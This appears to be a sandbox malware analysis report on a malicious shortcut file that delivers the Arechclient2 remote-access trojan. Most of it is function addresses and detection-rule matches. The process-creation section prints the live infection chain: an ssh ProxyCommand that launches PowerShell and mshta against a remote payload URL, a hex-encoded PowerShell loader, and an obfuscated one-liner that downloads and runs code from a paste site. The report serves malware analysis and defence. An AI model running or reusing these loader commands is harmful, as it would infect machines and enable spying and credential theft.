Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B14FF0	28_2_06B14FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B15D50	28_2_06B15D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B1B210	28_2_06B1B210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B14380	28_2_06B14380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B13060	28_2_06B13060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B10860	28_2_06B10860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B11199	28_2_06B11199
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B1E184	28_2_06B1E184
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B1B6C1	28_2_06B1B6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B1C738	28_2_06B1C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B1C729	28_2_06B1C729
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B164E0	28_2_06B164E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B164E9	28_2_06B164E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B164DE	28_2_06B164DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B15D40	28_2_06B15D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B182FA	28_2_06B182FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B1EAD0	28_2_06B1EAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B12B58	28_2_06B12B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B128A8	28_2_06B128A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B12898	28_2_06B12898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B10040	28_2_06B10040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B1D937	28_2_06B1D937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B2D6A0	28_2_06B2D6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B2C0F8	28_2_06B2C0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B2B8DE	28_2_06B2B8DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B24520	28_2_06B24520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B2D692	28_2_06B2D692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B2A0F0	28_2_06B2A0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B2A0E0	28_2_06B2A0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B295BD	28_2_06B295BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B295D8	28_2_06B295D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B2450B	28_2_06B2450B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_072BDB50	28_2_072BDB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_072B7AF8	28_2_072B7AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_072B5F8C	28_2_072B5F8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_072BE961	28_2_072BE961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_072BE970	28_2_072BE970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_079D0040	28_2_079D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_079D4840	28_2_079D4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_079D51D3	28_2_079D51D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_079D51E0	28_2_079D51E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_079D0719	28_2_079D0719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_079D06BE	28_2_079D06BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_079D0006	28_2_079D0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_079D482F	28_2_079D482F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 28_2_06B27758	28_2_06B27758
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0034B020	29_2_0034B020
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00341663	29_2_00341663
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00349C80	29_2_00349C80
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003623F5	29_2_003623F5
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003C8400	29_2_003C8400
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00376502	29_2_00376502
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0037265E	29_2_0037265E
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0034E6F0	29_2_0034E6F0
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0036282A	29_2_0036282A
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003789BF	29_2_003789BF
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003C0A3A	29_2_003C0A3A
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00376A74	29_2_00376A74
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00350BE0	29_2_00350BE0
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0036CD51	29_2_0036CD51
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0039EDB2	29_2_0039EDB2
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003A8E44	29_2_003A8E44
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003C0EB7	29_2_003C0EB7
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00376FE6	29_2_00376FE6
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003633B7	29_2_003633B7
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0036F409	29_2_0036F409
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0035D45D	29_2_0035D45D
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003494E0	29_2_003494E0
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0035F628	29_2_0035F628
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003616B4	29_2_003616B4
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0034F6A0	29_2_0034F6A0
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003678C3	29_2_003678C3
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0036DBA5	29_2_0036DBA5
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00361BA8	29_2_00361BA8
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00379CE5	29_2_00379CE5
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00347CC9	29_2_00347CC9
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0035DD28	29_2_0035DD28
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0036BFD6	29_2_0036BFD6
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00361FC0	29_2_00361FC0
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018B90CA	29_2_018B90CA
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018B90D1	29_2_018B90D1

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\27589682\updater.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: String function: 00BC1A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: String function: 00BD0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: String function: 00BD8B30 appears 42 times
Source: C:\faggbgb\AutoIt3.exe	Code function: String function: 00351A36 appears 34 times
Source: C:\faggbgb\AutoIt3.exe	Code function: String function: 00368B30 appears 42 times
Source: C:\faggbgb\AutoIt3.exe	Code function: String function: 00360D17 appears 70 times

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 4496
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 4496			Jump to behavior

Source: amsi64_7720.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 27.2.updater.exe.4c96e70.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 33.3.AutoIt3.exe.5dc5d6c.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 29.2.AutoIt3.exe.4d26e70.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 29.2.AutoIt3.exe.4d26e70.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 33.2.AutoIt3.exe.4bf6e70.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 27.2.updater.exe.4c96e70.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 33.2.AutoIt3.exe.4bf6e70.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: Process Memory Space: powershell.exe PID: 7720, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 27.2.updater.exe.4c96e70.1.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 29.2.AutoIt3.exe.4d26e70.1.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 33.2.AutoIt3.exe.4bf6e70.1.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winLNK@40/79@9/6

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C1A6AD GetLastError,FormatMessageW,

27_2_00C1A6AD

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C08DE9 AdjustTokenPrivileges,CloseHandle,	27_2_00C08DE9
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C09399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	27_2_00C09399
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00398DE9 AdjustTokenPrivileges,CloseHandle,	29_2_00398DE9
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_00399399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	29_2_00399399

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C1B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

27_2_00C1B976

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C14148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

27_2_00C14148

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C1C9DA CoInitialize,CoCreateInstance,CoUninitialize,

27_2_00C1C9DA

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C1443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

27_2_00C1443D

Source: C:\Windows\System32\OpenSSH\ssh.exe

File created: C:\Users\user\.ssh

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\134e9b5a5131414a9ec92122150d9aa3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4but251l.lkg.ps1

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\faggbgb\AutoIt3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\faggbgb\AutoIt3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: fsg5PWtTm2.lnk	Virustotal: Detection: 33%
Source: fsg5PWtTm2.lnk	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)" .
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Cmt'}).Name).Invoke((Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Gome'}).Name).Invoke('Nect',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Cmt'}).Name).Invoke((Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Gome'}).Name).Invoke('In-Exion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value\|Get-Member)\|Where-Object{(Get-Variable _).Value.Name-ilike'nl*a'}).Name).Invoke((GCI Variable:\s).Value)\|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1680,i,7793574155390070799,18078941807343672542,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\27589682\updater.exe "C:\Users\user~1\AppData\Local\Temp\27589682\updater.exe" C:\Users\user~1\AppData\Local\Temp\27589682\OWoDjWrI.dll
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown	Process created: C:\faggbgb\AutoIt3.exe "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x
Source: C:\faggbgb\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown	Process created: C:\faggbgb\AutoIt3.exe "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x
Source: C:\faggbgb\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C1